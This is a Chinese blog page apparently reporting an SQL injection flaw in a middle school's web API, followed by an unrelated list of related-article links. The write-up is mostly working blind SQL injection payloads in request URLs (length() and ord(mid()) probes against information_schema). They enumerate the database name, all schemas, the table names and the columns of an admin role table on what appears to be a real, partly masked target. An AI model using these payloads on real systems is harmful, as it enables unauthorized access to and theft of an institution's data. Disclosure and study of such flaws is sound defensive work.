当前位置: 首页 > news >正文

某中学sql注入漏洞

news 2026/6/5 21:14:29

漏洞复现

image
sql盲注
判断正确会回复正常消息
数据库长度为6
https://xxx.xxx.com/xxxApi/getJsxxxxxxp?school_id=3 and length(database())=6&news_url=1
image
school_id=3 and ord(mid(database(),1,1))=115&news_url=1
第一个字母是s
image
进行爆破
数据库名为school
?school_id=3 and database()='school'&news_url=1
image

https://xxxxxxxxxxxx?school_id=3 and length((select group_concat(schema_name)from information_schema.schemata))=118&news_url=1
所有数据库长度118

https://xxxxxxxxxxxxxxxxxxxx?school_id=3 and ord(mid((select group_concat(schema_name)from information_schema.schemata),1,1))=105&news_url=1

information_schema,civixxxx,clotxxxs,impoxxxt,lxxx,mysql,performance_schema,schooxxl,sys,xxxxxl_job,yuxxxxnzx_clxxxxddb,yxxx

数据表名长度1024

https://xxxxxxxxxxxxxxxxxxxx?school_id=3 and length((select group_concat(table_name) from information_schema.tables where table_schema='school'))=1024&news_url=1

t_adxxxn_role,t_adxxxn_role_tree,t_axxxx_tree,txxxxi

https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?school_id=3 and length((select group_concat(column_name) from information_schema.columns where table_schema='school'and table_name='t_admin_role'))=53&news_url=1

https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxx?school_id=3 and ord(mid((select group_concat(column_name) from information_schema.columns where table_schema='school'and table_name='t_admin_role'),1,1))=105&news_url=1

id,rolxxxme,code,stxxxxs,cxxxxdate,rxxxrk,cxxxxte_id

http://www.jsqmd.com/news/957467/

相关文章:

  • 如何高效配置OpenCore引导器:PC运行macOS的完整方案指南
  • VidDown:一个免费、本地优先的在线工具站(重点:视频解析下载)
  • 从数字疲劳到个性表达:如何用光标重塑你的桌面叙事
  • 多维聚合实战:从SQL ROLLUP到Pandas链式分析
  • Rustix库:Rust 系统编程 的 基石
  • 2026年 分度销厂家推荐排行榜:压入式/法兰型/拉环/焊接/按压/T型/自锁/L型/不锈钢凸轮式分度销品牌精选与选购指南 - 品牌企业推荐师(官方)
  • Python信用评分卡终极指南:从零开始构建专业风险模型
  • Qt 6.0安装后第一件事:用Qt Creator创建你的第一个Hello World程序(Windows平台)
  • 【每日一题】LeetCode 70. 爬楼梯 TypeScript
  • 苹果供应链管理:从JIT到产能买断的工程实践与启示
  • 如何用LibreSignage快速构建企业级数字标牌系统
  • 机器人领域简报(2026年5月29日—6月4日)
  • 2026沈阳和平区防水补漏哪家好?住建实地测评权威榜单TOP5|卫生间免砸砖/阳台屋顶/厨卫漏水维修(6月和平区专项调研) - 苏易修缮
  • 3步解锁你的加密音乐:Unlock-Music浏览器解密工具完全指南
  • # 2026年了,你还在手写每一行代码?Vibe Coding 正在颠覆软件开发
  • SuperCLIP:细粒度图像文本对齐的技术突破与应用
  • 深圳劳动纠纷律师支招:企业规章制度合规制定避坑指南 - 从来都是英雄出少年
  • Windows 上安装和配置 Codex
  • 零基础极速上手:如何用AI建站工具10分钟搭建一个专业企业官网
  • 为什么你会觉得AI离你很远?
  • Path of Building PoE2:如何用数据驱动构建优化你的流放之路2角色
  • 电子元器件采购进阶:从询价到供应链管理的核心策略
  • Boost升压电路双平台闭环仿真套件(PSIM+Simulink含参数推导与Bode分析)
  • 金仓V8在Win10安装后服务丢失?别慌,用这个工具(instsrv.exe)5分钟搞定
  • 光子晶体腔设计优化与水环境应用挑战
  • 3分钟搞定Axure RP中文界面:新手也能快速上手的完整汉化教程
  • 别再傻傻用DESCRIBE了!ABAP 7.4新语法 `LINES( )` 获取内表行数,一行代码搞定
  • 思源宋体CN:重新定义中文排版设计的免费字体解决方案
  • CAN 通信基础入门介绍
  • 2026年园艺工具品牌选购参考:绿植营养土、通用营养土、家用营养土、养花营养土、进口营养土、CPAI园艺产品综合梳理 - 海棠依旧大